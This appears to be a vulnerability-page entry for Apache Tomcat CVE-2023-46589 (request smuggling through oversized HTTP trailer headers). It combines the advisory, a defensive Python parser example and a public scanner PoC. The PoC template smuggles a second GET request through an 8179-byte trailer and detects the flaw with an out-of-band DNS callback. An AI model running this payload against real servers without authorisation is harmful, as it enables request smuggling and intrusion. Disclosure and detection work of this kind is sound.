Improper Input Validation vulnerability in Apache Tomcat. Tomcat from 11.0.0-M1 through 11.0.0-M10, from 10.1.0-M1 through 10.1.15, from 9.0.0-M1 through 9.0.82 and from 8.5.0 through 8.5.95 did not correctly parse HTTP trailer headers. A trailer header that exceeded the header size limit could cause Tomcat to treat a single request as multiple requests, leading to the possibility of request smuggling when behind a reverse proxy. Older, EOL versions may also be affected. Users are recommended to upgrade to version 11.0.0-M11 onwards, 10.1.16 onwards, 9.0.83 onwards or 8.5.96 onwards, which fix the issue.
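The handling the description calls for, as an added Python example (not Tomcat's code and not part of the PoC on this page): a chunked-body reader that counts the trailer section against a size limit and, on any parse error, reports that the connection must be closed instead of letting the leftover bytes be read as a new request. The names `read_chunked`, `after_body` and `TrailerTooLarge`, the 8192-byte default limit and both sample byte strings are assumptions made for the example.

```python
HEX = b"0123456789abcdefABCDEF"

class TrailerTooLarge(ValueError):
    """Trailer section exceeded the configured limit."""

def read_chunked(buf, max_trailer_bytes=8192):  # 8192 is an assumed limit
    """Decode one chunked body and return (body, trailers, rest); rest is
    what follows the final blank line. Any exception means the message
    boundary is unknown: close the connection, never reparse the rest."""
    pos, body = 0, bytearray()
    while True:                                  # chunk-size CRLF data CRLF
        eol = buf.find(b"\r\n", pos)
        if eol < 0:
            raise ValueError("truncated chunk-size line")
        tok = buf[pos:eol].split(b";", 1)[0].strip()   # drop chunk extensions
        if not tok or tok.strip(HEX):
            raise ValueError("invalid chunk size")
        size, pos = int(tok, 16), eol + 2
        if size == 0:
            break
        if buf[pos + size:pos + size + 2] != b"\r\n":
            raise ValueError("chunk data not followed by CRLF")
        body += buf[pos:pos + size]
        pos += size + 2
    trailers, start = {}, pos
    while True:                                  # trailer fields, then blank line
        eol = buf.find(b"\r\n", pos)
        end = len(buf) if eol < 0 else eol
        if end - start > max_trailer_bytes:      # limit covers the whole section
            raise TrailerTooLarge("trailer section over %d bytes" % max_trailer_bytes)
        if eol < 0:
            raise ValueError("truncated trailer section")
        line, pos = buf[pos:eol], eol + 2
        if not line:
            return bytes(body), trailers, buf[pos:]
        name, sep, value = line.partition(b":")
        if not sep or not name or name != name.strip():
            raise ValueError("malformed trailer field")
        trailers[name.decode("latin-1").lower()] = value.strip().decode("latin-1")

def after_body(buf, max_trailer_bytes=8192):
    """Return the bytes safe to parse as the next request, or None to close."""
    try:
        return read_chunked(buf, max_trailer_bytes)[2]
    except ValueError:
        return None

# Constructed samples (not captured traffic): same chunks, different trailer size.
OK = b"5\r\nfoo=b\r\n2\r\nar\r\n0\r\nx-check: 1\r\n\r\nNEXT"
BIG = b"5\r\nfoo=b\r\n2\r\nar\r\n0\r\nx-check: " + b"a" * 9000 + b"\r\n\r\nNEXT"
```

With the well-formed sample the bytes after the blank line are handed back as the next message; with the oversized trailer the reader returns nothing to parse, so the front end and back end cannot disagree about where the request ended.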
PoC code [publicly available]
id: CVE-2023-46589
info:
  name: Apache Tomcat - Request Smuggling
  author: zan8in
  severity: high
  verified: false
  description: |-
    Improper Input Validation vulnerability in Apache Tomcat.Tomcat from 11.0.0-M1 through 11.0.0-M10, from 10.1.0-M1 through 10.1.15, from 9.0.0-M1 through 9.0.82 and from 8.5.0 through 8.5.95 did not correctly parse HTTP trailer headers. A trailer header that exceeded the header size limit could cause Tomcat to treat a single request as multiple requests leading to the possibility of request smuggling when behind a reverse proxy. Older, EOL versions may also be affected. Users are recommended to upgrade to version 11.0.0-M11 onwards, 10.1.16 onwards, 9.0.83 onwards or 8.5.96 onwards, which fix the issue.
  reference:
    - https://hackerone.com/reports/2280391
    - https://github.com/ir3shio/nuclei/blob/e9cb41056444f8ba4f04fff285d1dafedb09f3bc/cve/CVE-2023-46589.yaml
    - https://nvd.nist.gov/vuln/detail/CVE-2023-46589
  tags: cve,cve2023,tomcat,smuggling
  created: 2024/02/02
set:
  payload: repeat("a",8179)
  oob: oob()
  oobDNS: oob.DNS
rules:
  r0:
    request:
      method: POST
      path: /examples/test.jsp
      body: |-
        5
        foo=b
        2
        ar
        0
        testtrailer: {{payload}}
        a: GET /examples/?this_is_attack HTTP/1.1
        Host: {{oobDNS}}
    expression: oobCheck(oob, oob.ProtocolDNS, 3)
expression: r0()